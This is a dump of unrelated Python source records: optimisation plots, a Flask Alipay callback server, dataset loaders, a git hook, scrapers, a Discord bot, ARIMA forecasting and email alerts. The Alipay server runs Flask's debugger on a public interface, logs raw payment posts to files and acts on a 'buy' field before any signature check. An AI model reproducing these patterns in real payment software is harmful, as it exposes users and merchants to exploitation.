Griewank)\r\n ws = []\r\n for i in range(30):\r\n ws.append([-600.0, 600.0]) \r\n swarm.initParticles(ws)\r\n \r\n runPlan = [250]\r\n for r in runPlan:\r\n for t in range(r):\r\n swarm.update()\r\n #print swarm.globalbestFitness\r\n \r\n bounds.append(swarm.bound)\r\n bests.append(swarm.globalbestFitness)\r\n \r\n dataLen = len(bounds)\r\n fig = plt.figure()\r\n ax1 = fig.add_subplot(111)\r\n ax1.plot(np.arange(dataLen), bounds,'r',label=\"bound\")\r\n ax1.legend(loc=1)\r\n ax1.set_title(\"Griewank\")\r\n ax1.set_ylabel('bound value')\r\n ax1.set_xlabel('runs')\r\n ax2 = ax1.twinx() # this is the important function\r\n ax2.plot(np.arange(dataLen), bests, 'g',label = \"best\")\r\n ax2.legend(loc=2)\r\n #ax2.set_xlim([0, np.e]);\r\n ax2.set_ylabel('best value')\r\n plt.show()","sub_path":"etc/PSO-Conv/C4.py","file_name":"C4.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"475443488","text":"from flask import Flask,request,render_template\nimport time\nfrom alipay import AliPay\nfrom app import getAlipay\nfrom pay import buy_get\napp = Flask(__name__)\napp_private_key_string = open(\"rsa_private_key.pem\").read()\nalipay_public_key_string = open(\"rsa_public_key.pem\").read()\nalipay = AliPay(\n appid='201807*****500495', \n app_notify_url='http://119.17.171.238:8080/', # 默认回调url\n app_private_key_string=app_private_key_string,\n alipay_public_key_string=alipay_public_key_string, # 支付宝的公钥,验证支付宝回传消息使用,不是你自己的公钥,\n sign_type=\"RSA2\", # RSA 或者 RSA2\n debug=False # 默认False\n)\n@app.route('/',methods=['POST'])\ndef hello_world():\n\tdata = request.form.to_dict()\n\tprint(data)\n\twith open(str(time.time())+\".txt\",'w+') as f:\n\t\tf.write(str(data))\n\tif request.form.get('status')=='buy':\n\t\treturn buy_get(request.form.get('buy_num'))\n\tsignature = data.pop(\"sign\")\n\tsuccess = alipay.verify(data, signature)\n\tprint(success)\n\tif success and data[\"trade_status\"] in (\"TRADE_SUCCESS\", \"TRADE_FINISHED\" ):\n\t\tif request.form.get('trade_status')=='TRADE_SUCCESS':\n\t\t\tbuy_id=request.form.get('buyer_id')\n\t\t\tbuy_num=request.form.get('receipt_amount')\n\t\t\tprint('单号:%s'%buy_id)\n\t\t\tprint('金额:%s'%buy_num)\n\t\t\tprint(type(buy_num))\n\t\t\tgetAlipay(buy_id,float(buy_num)*0.97)\n\n\t\t# getAlipay(request.form.get('buyer_id'),request.form.get('receipt_amount')*0.97)\n\treturn 'success'\n@app.route('/',methods=['GET'])\ndef index():\n\treturn render_template('index.html')\n# \treturn '''\n# \t\n# \n# \n# \n# \n#\n# \t'''\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n\n","sub_path":"huabei_alipay/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"496249858","text":"import torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nimport numpy as np\nimport pandas as pd\nimport os\nfrom PIL import Image\n\nclass EgoDexter(Dataset):\n '''Link to dataset: http://handtracker.mpi-inf.mpg.de/projects/OccludedHands/EgoDexter.htm'''\n \n def __init__(self, config):\n self.root_dir = config['path']\n \n self.samples = get_image_names(self.root_dir)[:100]\n \n self.transform_image = transforms.Compose([\n transforms.CenterCrop((480,480)), \n transforms.Resize((128,128)), \n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n \n print('Images in EgoDexter dataset: {}'.format(len(self.samples)))\n\n def __len__(self):\n return len(self.samples)\n\n def __getitem__(self, idx):\n \n img_name = self.samples[idx]\n image = Image.open(self.root_dir + img_name)\n image = self.transform_image(image)\n \n\n return {'image': image}\n\n \ndef get_image_names(root_dir): \n #folder = 'Fruits'\n #img_names = os.listdir(root_dir + folder + '/color/')\n #img_names = [folder + '/color/' + x for x in img_names] \n #img_names = np.sort(img_names)\n \n \n \n img_names = np.array([])\n for folder in os.listdir(root_dir):\n images = os.listdir(root_dir + folder + '/color/')\n images = [folder + '/color/' + x for x in images]\n img_names = np.hstack((img_names, images))\n \n img_names = np.sort(img_names)\n return img_names\n\n\n","sub_path":"dataset/egodexter_unlabelled.py","file_name":"egodexter_unlabelled.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"426527780","text":"#!/usr/bin/env python\n\"\"\"Git pre-commit hook to run pylint on python files.\n\nfrom https://gist.github.com/nivbend/7e0e306a98138916b3c9#file-run_pylint-py\n\"\"\"\n\nfrom subprocess import check_output, CalledProcessError\nfrom sys import stderr\nfrom pathlib import Path\n\n(SUCCESS,\n GIT_DIFF_ERROR,\n PYLINT_ERRORS) = range(3)\n\nPYLINTRC = \".pylintrc\"\n\n\ndef _print_error(message):\n \"\"\"Print an error message to stderr.\"\"\"\n print(message, file=stderr)\n\n\ndef _is_python_script(myfile):\n \"\"\"Return true for *.py files and python scripts (\"#! /path/to/python\").\"\"\"\n if not myfile.is_file():\n return False\n\n if not myfile.suffix == '.py':\n try:\n with open(myfile, 'r') as contents:\n first_line = contents.readline()\n except OSError:\n return False\n\n # Check shebang.\n if not (first_line.startswith('#!') and 'python' in first_line):\n return False\n\n return True\n\n\ndef run():\n \"\"\"Verify changed python files using pylint.\"\"\"\n # Get all changed files' paths.\n gitdiff = ['git', 'diff', '--staged', '--name-only', 'HEAD']\n try:\n changed_files = (\n Path(file) for file in check_output(gitdiff).decode().splitlines()\n )\n except CalledProcessError:\n _print_error(\"Couldn't get list of changed files\")\n return GIT_DIFF_ERROR\n\n # Limit checks to python scripts only.\n changed_files = [\n filename for filename in changed_files\n if _is_python_script(filename)\n ]\n\n if changed_files:\n try:\n check_output(['pylint', *changed_files])\n except CalledProcessError as error:\n _print_error(error.output)\n _print_error('pylint returned errors, aborting commit.')\n return PYLINT_ERRORS\n\n return SUCCESS\n\n\nif __name__ == \"__main__\":\n exit(run())\n","sub_path":".config/git/templatedir/hooks/pre-commit.d/check_pylint.py","file_name":"check_pylint.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224234657","text":"import pandas as pd \r\nimport sqlite3\r\nimport datetime \r\nimport datetime\r\nfrom sqlalchemy import create_engine\r\n\r\nconn = sqlite3.connect('/home/shubhankar/.virtualenvs/trader/heroku/bseData.db')\r\ndf = pd.read_sql('SELECT SecurityCode FROM tbCoMapping',conn)\r\nk = df['SecurityCode'].drop_duplicates().tolist()\r\n\r\nfor i in k:\r\n\turl = 'https://api.bseindia.com/BseIndiaAPI/api/DwnldExcelIT15/w?scripcode={0}&fromdt=&todt=&flag=InsiderTrade15'\r\n\ttry:\r\n\t\tdf2 = pd.read_csv(url.format(i),parse_dates=['Reported to Exchange'])\r\n\texcept Exception as e:\r\n\t\tprint('Error getting data for {0}, moving on..'.format(i))\r\n\t\tcontinue\r\n\tprint('Gathering data for {0}'.format(i))\r\n\tma_list =\t[\r\n\t\t'SecurityCode',\r\n\t\t'SecurityName',\r\n\t\t'NameofPerson',\r\n\t\t'Categoryofperson',\r\n\t\t'TypeofSecuritiesBefore', \r\n\t\t'NumShareholdingBefore',\r\n\t\t'PctShareholdingBefore', \r\n\t\t'TypeofSecuritiesTransacted', \r\n\t\t'NumberofSecuritiesTransacted', \r\n\t\t'ValueofSecuritiesTransacted', \r\n\t\t'TransactionType', \r\n\t\t'TypeofSecuritiesAfter',\r\n\t\t'NumShareholdingAfter', \r\n\t\t'PctShareholdingAfter', \r\n\t\t'TransactionDateFrom', \r\n\t\t'TransactionDateTo', \r\n\t\t'DateofIntimationtoCompany', \r\n\t\t'ModeofAcquisition', \r\n\t\t'DerivativeType', \r\n\t\t'DerivativeContractSpec', \r\n\t\t'DerivativesBuyValue', \r\n\t\t'DerivativesBuyUnits', \r\n\t\t'DerivativesSaleValue',\r\n\t\t'DerivativesSaleUnits', \r\n\t\t'Exchange', \r\n\t\t'ReportedtoExchange'\r\n\t]\r\n\tengine = create_engine('sqlite:////home/shubhankar/.virtualenvs/trader/local/myapp2/site.db')\r\n\tdf2.columns= ma_list\r\n\tdf2.to_sql('Filings',con=engine,if_exists='append',index=False)\r\n\t# db.session.add(df2)\r\n\tprint('Completed data for {0}'.format(i))\r\n# db.session.commit()","sub_path":"InsiderTrades/getInsiderDataH.py","file_name":"getInsiderDataH.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"257526394","text":"import logging\nfrom json import loads\n\nfrom discord import Embed\nfrom datetime import datetime\n\nfrom discord.ext import commands, menus\n\n\ndiff_emotes = { # Will put actual emotes here when I can be arsed\n \"easy\": \"Easy\",\n \"normal\": \"Normal\",\n \"hard\": \"Hard\",\n \"expert\": \"Expert\",\n \"expertPlus\": \"Expert Plus\",\n}\n\n\nasync def diff_sort(difficulties):\n diff_order = [\"easy\",\"normal\",\"hard\",\"expert\",\"expertPlus\"]\n diff_copy = [\"easy\",\"normal\",\"hard\",\"expert\",\"expertPlus\"]\n for diff in diff_order:\n if diff not in difficulties:\n diff_copy.remove(diff)\n return [x for _,x in sorted(zip(difficulties,diff_copy))]\n\n\nclass SearchMenu(menus.ListPageSource):\n def __init__(self, data, embed):\n super().__init__(data, per_page=6)\n self.embed = embed\n\n async def format_page(self, menu, entries):\n self.embed.clear_fields()\n self.embed.set_footer(text=f\"Page {(menu.current_page+1)}/{self.get_max_pages()}\")\n gap_check = True\n for entry in entries:\n self.embed.add_field(\n name=entry[0],\n value=entry[1],\n inline=True\n )\n if gap_check is True:\n self.embed.add_field(\n name=\"\\u200b\",\n value=\"\\u200b\",\n inline=True\n )\n gap_check = False\n else:\n gap_check = True\n return self.embed\n\n\nclass BeatSaver(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n\n async def cog_before_invoke(self, ctx):\n logging.info(f\"Invoked {ctx.command} in {ctx.guild.name} by {ctx.author.name}\\nArgs: {ctx.args}\" )\n\n async def cog_after_invoke(self, ctx):\n logging.info(f\"Concluded {ctx.command}\")\n\n\n @commands.cooldown(1, 5, commands.BucketType.user)\n @commands.group(invoke_without_command=True, aliases=[\"bs\",\"bsr\"])\n async def beatsaver(self, ctx, key, diff=None):\n async with ctx.channel.typing():\n async with self.bot.session.get(f\"https://beatsaver.com/api/maps/detail/{key}\") as resp:\n if await resp.text() == \"Not Found\":\n raise commands.BadArgument\n response = loads(await resp.text())\n difficulties = list()\n for x in response[\"metadata\"][\"difficulties\"]:\n if response[\"metadata\"][\"difficulties\"][x] is True:\n difficulties.append(x)\n difficulties = await diff_sort(difficulties)\n if diff is not None and diff in difficulties:\n diff_stats = response[\"metadata\"][\"characteristics\"][0][\"difficulties\"][diff]\n else:\n diff = difficulties[-1]\n diff_stats = response[\"metadata\"][\"characteristics\"][0][\"difficulties\"][diff]\n if response[\"metadata\"][\"songSubName\"] == '':\n title = response[\"metadata\"][\"songName\"]\n else:\n title = response[\"metadata\"][\"songName\"]+\" - \"+response[\"metadata\"][\"songSubName\"]\n m, s = divmod(response[\"metadata\"][\"duration\"], 60)\n embed = Embed(\n title=title,\n url=f\"https://beatsaver.com/beatmap/{key}\",\n description=f\"**{response['metadata']['songAuthorName']}**\",\n colour=0x232325\n )\n embed.add_field(\n name=\"Map Stats\",\n value=f\"Duration: {m:02d}:{s:02d}\\nBPM: {response['metadata']['bpm']}\\nMapper: {response['metadata']['levelAuthorName']}\",\n inline=True\n )\n embed.add_field(\n name=\"BeatSaver Stats\",\n value=f\"🔑: {response['key']}\\n💾: {response['stats']['downloads']:,}\\n💯: {int(response['stats']['rating']*100)}%\\n📅: {(datetime.fromisoformat(response['uploaded'][:-1])).strftime('%Y/%m/%d')}\",\n inline=True\n )\n message=str()\n for difficulty in difficulties:\n message=f\"{message}\\n{diff_emotes[difficulty]}\"\n embed.add_field(\n name=\"Difficulties\",\n value=message,\n inline=True\n )\n embed.add_field(\n name=f\"Difficulty Stats {diff_emotes[diff]}\",\n value=f\"NPS: {round(diff_stats['notes']/diff_stats['length'],2)}\\nNJS: {diff_stats['njs']}\\nOffset: {round(diff_stats['njsOffset'],2)}\\nNotes: {diff_stats['notes']}\\n Bombs: {diff_stats['bombs']}\\n Obstacles: {diff_stats['obstacles']}\",\n inline=True\n )\n embed.add_field(\n name=\"Links\",\n value=f\"[Preview Map](https://skystudioapps.com/bs-viewer/?id={response['key']})\\n[Download Map](https://beatsaver.com/api/download/key/{response['key']})\\n[Song on Youtube](https://www.youtube.com/results?search_query={response['metadata']['songAuthorName'].replace(' ','+')}+{title.replace(' ','+')})\\n[Song on Spotify](https://open.spotify.com/search/{response['metadata']['songName'].replace(' ','%20')})\",\n inline=True\n )\n embed.set_image(url=\"https://beatsaver.com\"+response[\"coverURL\"])\n await ctx.reply(embed=embed)\n logging.info(\"successfully concluded beatsaver\")\n\n\n# https://beatsaver.com/api/search/text/0?q=nekopara&?automapper=1\n @beatsaver.command(aliases=[\"s\", \"map\"])\n async def search(self, ctx, *, query):\n async with ctx.channel.typing():\n query = query.replace(' ','%20')\n async with self.bot.session.get(f\"https://beatsaver.com/api/search/text/0?q={query}&?automapper=1\") as resp:\n response = loads(await resp.text())\n embed = Embed(colour=0x232325)\n embed.set_thumbnail(url=\"https://beatsaver.com\"+response[\"docs\"][0][\"coverURL\"])\n embed.set_author(\n name=\"BeatSaver Search\",\n url=f\"https://beatsaver.com/search?q={query}\"\n )\n data = list()\n for result in response[\"docs\"]:\n if result[\"metadata\"][\"songSubName\"] == '':\n title = result[\"metadata\"][\"songName\"]\n else:\n title = result[\"metadata\"][\"songName\"]+\" - \"+result[\"metadata\"][\"songSubName\"]\n if result['metadata']['levelAuthorName'] == \"Beat Sage\":\n author_emote = \"🤖\"\n else:\n author_emote = \"🥰\"\n difficulties = list()\n for x in result[\"metadata\"][\"difficulties\"]:\n if result[\"metadata\"][\"difficulties\"][x] is True:\n difficulties.append(x)\n difficulties = await diff_sort(difficulties)\n diff_message = str()\n for difficulty in difficulties:\n diff_message = f\"{diff_message} {diff_emotes[difficulty]}\"\n m, s = divmod(result[\"metadata\"][\"duration\"], 60)\n message = f\"\"\"🔑 {result['key']}\n {author_emote} {result['metadata']['levelAuthorName']}\n 💾 {result['stats']['downloads']:,}\n 💯 {int(result['stats']['rating']*100)}%\n ⏱ {m:02d}:{s:02d}\n 📅 {(datetime.fromisoformat(result['uploaded'][:-1])).strftime('%Y/%m/%d')}\n {diff_message}\n [BS Page](https://beatsaver.com/beatmap/{result['key']})\"\"\"\n data.append((title, message))\n pages = menus.MenuPages(source=SearchMenu(data, embed), clear_reactions_after=True)\n await pages.start(ctx)\n\n\n @beatsaver.error\n async def beatsaver_error(self, ctx, error):\n # The local error handler seems to print the errors and I'm not too sure why :/\n logging.info(\"beatsaver local error handler invoked\")\n if isinstance (error, commands.BadArgument):\n logging.info(\"BadArgument handler ran\")\n return await ctx.send(\"You've given a bad argument!\\nYou should totally try ``e970`` though <:AYAYATroll:839891422140432405>\")\n if isinstance (error, commands.MissingRequiredArgument):\n logging.info(f\"MissingRequiredArgument handler ran. Missing: {error.param.name}\")\n return await ctx.send(\"You didn't give a required argument.\\nYou should totally try ``e970`` though <:AquaTroll:845802819634462780>\")\n logging.info(\"Error unhandled by local handler\")\n return delattr(ctx.command, \"on_error\")\n\n\ndef setup(bot):\n bot.add_cog(BeatSaver(bot))","sub_path":"cogs/beatsaver.py","file_name":"beatsaver.py","file_ext":"py","file_size_in_byte":8443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641603734","text":"import requests\nimport colorama\n\nfrom colorama import Fore, Back, Style\n\ndef processInput(input, recognizedKeyword):\n\n location = \"\"\n locationRecognized = False\n counter = 0\n\n\n for i in input:\n counter += 1\n\n i = i.lower()\n\n if i != recognizedKeyword and counter > 2:\n i = i + \" \"\n location += i\n locationRecognized = True\n\n tempLocation = location\n location = location.replace(\" \", \"+\")\n\n weather_service = \"http://wttr.in/\"\n\n response = requests.get(weather_service + location)\n\n print(response.text)\n print(\"WARNING: Weather only supports the today's forecast.\")\n\n if not locationRecognized:\n tempLocation = \"No location specification detected. Weather information gathered from IP address.\"\n\n print(f\"\\n{Fore.BLACK}{Back.GREEN}Recognized Weather Location:{Style.RESET_ALL}{Style.BRIGHT}{Fore.RED}\" + \" \" + tempLocation + f\"{Style.RESET_ALL}\\n\")\n\n\n\n\n","sub_path":"modules/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368844538","text":"#美国消费者信心指数\nimport itertools\nimport pandas as pd\nimport numpy as np\nimport statsmodels.api as sm\nimport seaborn as sns #used for data show advance then matplotlib\nimport matplotlib.pylab as plt #used for data show\n\nfrom scipy import stats\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom statsmodels.graphics.api import qqplot\n\nimport time\nimport sys\n\n#训练模型\n\n#1.数据预处理\nSentiment = pd.read_csv('./examples/jd_bot/arima/confidence.csv', index_col='date', parse_dates=['date'])\n#index_col=0, parse_dates=[0]\nprint(\"head:\", Sentiment.head())\nprint(\"tail:\", Sentiment.tail())\n\n#切分为测试数据和训练数据\nn_sample = Sentiment.shape[0] #2007 - 2017 = 12*13 = 132\nn_train = 120 # 2007 - 2016 = 12*12 = 120\nn_forecast = n_sample - n_train # 12\nprint(\"n_sample:%d n_train:%d n_forecast:%d\" %(n_sample, n_train, n_forecast))\n\nts_train = Sentiment.iloc[:n_train]['confidence']\nts_test = Sentiment.iloc[n_train:]['confidence']\nprint(\"ts_train.head():\", ts_train.head())\nprint(\"ts_train.tail():\", ts_train.tail())\nprint(\"ts_test.head():\", ts_test.head())\nprint(\"ts_test.tail():\", ts_test.tail())\n\nsentiment_short = Sentiment.loc['2007':'2017']\nsentiment_short.plot(figsize = (12,8))\nplt.title(\"Consumer Sentiment\")\nplt.legend(bbox_to_anchor = (1.25,0.5))\nsns.despine()\nsentiment_short= sentiment_short.diff(1)\n\n\n'''\n#2.时间序列的差分d——将序列平稳化\nsentiment_short['diff_1'] = sentiment_short['confidence'].diff(1)\n# 1个时间间隔,一阶差分,再一次是二阶差分\nsentiment_short['diff_2'] = sentiment_short['diff_1'].diff(1)\nsentiment_short.plot(subplots=True, figsize=(18, 12))\n\n\n#使用一阶差分平稳化后的序列\nsentiment_short= sentiment_short.diff(1)\n#这里删除回原数据来展示,不然下一步会报错 ValueError: x is required to have ndim 1 but has ndim 2\ndel sentiment_short['diff_2']\ndel sentiment_short['diff_1']\n\nfig = plt.figure(figsize=(12,8))\nax1= fig.add_subplot(111)\ndiff1 = sentiment_short.diff(1)\ndiff1.plot(ax=ax1)\n\nfig = plt.figure(figsize=(12,8))\nax2= fig.add_subplot(111)\ndiff2 = sentiment_short.diff(2)\ndiff2.plot(ax=ax2)\n\n#3.1.分别画出ACF(自相关)和PACF(偏自相关)图像\nfig = plt.figure(figsize=(12,8))\n\nax11 = fig.add_subplot(211)\nfig = sm.graphics.tsa.plot_acf(sentiment_short, lags=20,ax=ax11)\nax11.xaxis.set_ticks_position('bottom')\nfig.tight_layout()\n\nax22 = fig.add_subplot(212)\nfig = sm.graphics.tsa.plot_pacf(sentiment_short, lags=20, ax=ax22)\nax22.xaxis.set_ticks_position('bottom')\nfig.tight_layout()\n'''\n\n\n#4.2 可视化结果:四个图的整合函数,可以改参数直接调用\n#3.2.可视化结果\ndef tsplot(y, lags=None, title='', figsize=(14, 8)):\n\n fig = plt.figure(figsize=figsize)\n layout = (2, 2)\n ts_ax = plt.subplot2grid(layout, (0, 0))\n hist_ax = plt.subplot2grid(layout, (0, 1))\n acf_ax = plt.subplot2grid(layout, (1, 0))\n pacf_ax = plt.subplot2grid(layout, (1, 1))\n\n y.plot(ax=ts_ax)\n ts_ax.set_title(title)\n y.plot(ax=hist_ax, kind='hist', bins=25)\n hist_ax.set_title('Histogram')\n sm.graphics.tsa.plot_acf(y, lags=lags, ax=acf_ax)\n sm.graphics.tsa.plot_pacf(y, lags=lags, ax=pacf_ax)\n [ax.set_xlim(0) for ax in [acf_ax, pacf_ax]]\n sns.despine()\n fig.tight_layout()\n return ts_ax, acf_ax, pacf_ax\n\ntsplot(sentiment_short, title='Consumer Sentiment', lags=36)\n\n\nprint(\"#4.建立模型——参数选择\")\n#4.建立模型——参数选择\nmodel_results = ARIMA(ts_train, order=(2,0,0)).fit()#(p,d,q)\n#model_results = arima200.fit()\n\n#4.1 参数计算: 遍历,寻找适宜的参数\np_min = 0\nd_min = 0\nq_min = 0\nd_max = 0\n\n#long time cost\n#p_max = 8\n#q_max = 8\n\n#less time cost\np_max = 4 #for test\nq_max = 4 #for test\n#failed : AIC:(4, 3) BIC:(1, 4)\n\n# Initialize a DataFrame to store the results,,以BIC准则\nresults_bic = pd.DataFrame(index=['AR{}'.format(i) for i in range(p_min,p_max+1)],\n columns=['MA{}'.format(i) for i in range(q_min,q_max+1)])\n\nfor p,d,q in itertools.product(range(p_min,p_max+1),range(d_min,d_max+1),range(q_min,q_max+1)):\n \n if p==0 and d==0 and q==0:\n results_bic.loc['AR{}'.format(p), 'MA{}'.format(q)] = np.nan\n continue\n try:\n model = ARIMA(ts_train, order=(p, d, q),)\n results = model.fit() #\tFit (estimate) the parameters of the model.\n print(\"p:%.2f d:%.2f q:%.2f results.bic:%.2f\\n\" %(p, d, q, results.bic))\n results_bic.loc['AR{}'.format(p), 'MA{}'.format(q)] = results.bic\n sys.exit()\n except:\n continue\n\n#BIC result\nresults_bic = results_bic[results_bic.columns].astype(float)\n\nprint(\"BIC计算获取的参数:\", results_bic)\n\n#画出BIC热度图结果如下:\nfig, ax = plt.subplots(figsize=(10, 8))\nax = sns.heatmap(results_bic,\n mask=results_bic.isnull(),\n ax=ax,\n annot=True,\n fmt='.2f',\n )\nax.set_title('BIC')\n\n#模型评价准则\ntrain_results = sm.tsa.arma_order_select_ic(ts_train, ic=[\"aic\", \"bic\"], trend=\"c\", max_ar=4, max_ma=4)\n#aic_min_order = train_results.aic_min_order\nbic_min_order = train_results.bic_min_order\n\nprint(\"BIC:\", bic_min_order)\n#BIC:(p,q) \n#BIC: (1, 4)\n\n#AIC:(4, 3) BIC:(1, 4) -> BIC: p = 1, q = 4 -> AR1 -> MA4\n# AR -> p; MA -> q \n\n#### \n\n\"\"\"\n#6. 模型检验\n#6.1 残差检验\n\n#6.2 自相关性校验(使用D-W校验)\ndw_result = sm.stats.durbin_watson(model_results.resid.values)\nprint(\"自相关性校验(使用D-W检验结果):\", dw_result)\nprint(\"D-W校验结果说明: D-W 如果接近2: 即不存在(一阶)自相关性!为正确结果,残差不应该存在相关性!\")\n\n#6.3 残差-正态分布校验(使用QQPlot图)\nresid = model_results.resid #残差\nfig = plt.figure(figsize=(12,8))\nax = fig.add_subplot(111)\nfig = qqplot(resid, line='q', ax=ax, fit=True)\n\n#6.4 残差-白噪声检验(Ljung-Box检验)\nr,q,p = sm.tsa.acf(resid.values.squeeze(), qstat=True)\ndata = np.c_[range(1,41), r[1:], q, p]\n# 白噪声:Prob(>Q)即P值大部分都大于0.05\ntable = pd.DataFrame(data, columns=['lag', \"AC\", \"Q\", \"Prob(>Q)\"]) #lag-阶数\nprint(table.set_index('lag'))\n\n\"\"\"\n\n#7.模型预测\npredict_sunspots = model_results.predict('2017-01','2017-12', dynamic=True)\nfig, ax = plt.subplots(figsize=(12, 8))\nax = Sentiment.iloc[0:]['confidence'].plot(ax=ax)\npredict_sunspots.plot(ax=ax)\n\nplt.show()\n","sub_path":"examples/jd_bot/arima/test_arima_with_fit.py","file_name":"test_arima_with_fit.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"143830176","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 19 15:11:44 2018\r\n\r\n@author: yihlo\r\n\"\"\"\r\n\r\nfrom mydf import *\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.base import MIMEBase\r\nfrom email.header import Header\r\nfrom email.utils import parseaddr, formataddr\r\nfrom email import encoders\r\nimport smtplib\r\nfrom datetime import datetime, timedelta\r\nimport os\r\nimport io\r\nimport sys\r\nfrom stream_conf import my_conf\r\n\r\nsys.stdin = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8', line_buffering=True)\r\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8', line_buffering=True)\r\ndf_detection = pd.read_csv('/data/data_analytics/final_history_dataset/stream_detection_CART.csv')\r\ndf_pred = pd.read_csv('/data/data_analytics/final_history_dataset/stream_CART_pred.csv')\r\ndf_pred_reason = pd.read_csv('/data/data_analytics/final_history_dataset/stream_CART_pred_reason.csv')\r\nfrom_addr = 'Bluetechnology_System@fareastone.com.tw'\r\nto_addr = my_conf.detection_mail_addr\r\n\r\ndef format_addr(s):\r\n name, addr = parseaddr(s)\r\n return formataddr((Header(name, 'utf-8').encode(), addr))\r\n\r\n################################################################################################\r\n################## 即時異常偵測通知 ########################\r\n################################################################################################\r\ntime = df_detection.time.max() \r\nif os.path.isfile('last_time_detection_mail'):\r\n last_time_send_mail = pd.read_csv('last_time_detection_mail').last_time_send_mail.astype('datetime64').iloc[0]\r\n time_diff = pd.Series(time).astype('datetime64').iloc[0] - last_time_send_mail\r\n can_send = time_diff.total_seconds() > my_conf.detection_mail_interval\r\nelse: \r\n can_send = True\r\nif df_detection.pred[df_detection.time == time].iloc[0] == 1 and can_send:\r\n reason = pd.read_csv('/data/data_analytics/final_history_dataset/CART_detection_reason/CART_detection_reason_{}.csv'.format(time.replace(':', '')), header = None)[0]\r\n reason = '\\n'.join(reason).replace(':0', ':正常').replace(':1', ':異常')\r\n text = '''\r\nHI ALL,\r\n 藍科機器學習系統於 {time} 偵測出 COH 系統有異常之現象發生,詳細原因如下:\r\n\r\n{reason}\r\n\r\n---------------------------------------------\r\n本郵件由系統自動發出,請勿回覆本郵件。\r\n'''.format(time = time, reason = reason)\r\n msg = MIMEText(text, 'plain', 'utf-8')\r\n msg['From'] = format_addr('藍科智慧管理員 <%s>' % from_addr)\r\n msg['To'] = ','.join(map(format_addr, to_addr))\r\n msg['Subject'] = Header('【即時異常偵測通知】【{}】COH 系統異常通知'.format(time), 'utf-8')\r\n\r\n smtp_server = '10.68.68.109'\r\n smtp_port = 25\r\n server = smtplib.SMTP(smtp_server, smtp_port)\r\n error_list = server.sendmail(from_addr, to_addr, msg.as_string())\r\n server.quit()\r\n if error_list == {} : \r\n pd.DataFrame({'last_time_send_mail': [time]}).to_csv('last_time_detection_mail', index = False)\r\n print('郵件發送成功 !')\r\n################################################################################################\r\n################## 異常預測通知 ########################\r\n################################################################################################\r\nif df_pred.time.max() == df_pred_reason.time.max():\r\n time = df_pred.time.max() \r\n pred_time_value = df_pred.pred.iloc[-1]\r\n pred_time_last_value = df_pred.pred.iloc[-2]\r\n pred_reason_value = df_pred_reason.pred[df_pred_reason.time == time].iloc[0]\r\n boo_send_1 = pred_time_value <= my_conf.pred_mail_level and pred_time_value > 0\r\n boo_send_2 = pred_time_last_value == 0 or pred_time_last_value > my_conf.pred_mail_level\r\n if boo_send_1 and boo_send_2:\r\n pred_time_reason = pd.read_csv('/data/data_analytics/final_history_dataset/CART_pred_time/CART_pred_time_{}.csv'.format(time.replace(':', '')), header = None)[0]\r\n pred_time_reason = '\\n'.join(pred_time_reason)\r\n pred_reason = pd.read_csv('/data/data_analytics/final_history_dataset/CART_pred_reason/CART_pred_reason_{}.csv'.format(time.replace(':', '')), header = None)[0]\r\n pred_reason = '\\n'.join(pred_reason)\r\n text = '''\r\nHI ALL,\r\n 藍科機器學習系統於 {time} 預測出 COH 系統再過 {pred_time_value} 分鐘可能會有異常之現象發生,\r\n 且可能發生的異常原因為 {pred_reason_value} ,所以在此提醒您,而系統會如此預測的���因如下:\r\n\r\n1.\r\n{pred_time_reason}\r\n\r\n2.\r\n{pred_reason}\r\n\r\n---------------------------------------------\r\n本郵件由系統自動發出,請勿回覆本郵件。\r\n'''.format(time = time, pred_time_value = pred_time_value, pred_time_reason = pred_time_reason, pred_reason_value = pred_reason_value, pred_reason = pred_reason)\r\n msg = MIMEText(text, 'plain', 'utf-8')\r\n msg['From'] = format_addr('藍科智慧管理員 <%s>' % from_addr)\r\n msg['To'] = ','.join(map(format_addr, to_addr))\r\n msg['Subject'] = Header('【異常預測通知】COH 系統異常預測提醒'.format(time), 'utf-8')\r\n \r\n smtp_server = '10.68.68.109'\r\n smtp_port = 25\r\n server = smtplib.SMTP(smtp_server, smtp_port)\r\n error_list = server.sendmail(from_addr, to_addr, msg.as_string())\r\n server.quit()\r\n if error_list == {} : print('郵件發送成功 !')","sub_path":"FET/stream/Each_5_check_mail.py","file_name":"Each_5_check_mail.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176566008","text":"from pythonmock.any_parameter import AnyParameter\n\n\nclass MockFunctionParameters(object):\n args: tuple\n kwargs: dict\n\n def __init__(self, args: tuple, kwargs: dict):\n self.args = args\n self.kwargs = kwargs\n\n def is_match(self, args, kwargs) -> bool:\n return self.__check_args(args) and self.__check_kwargs(kwargs)\n\n def 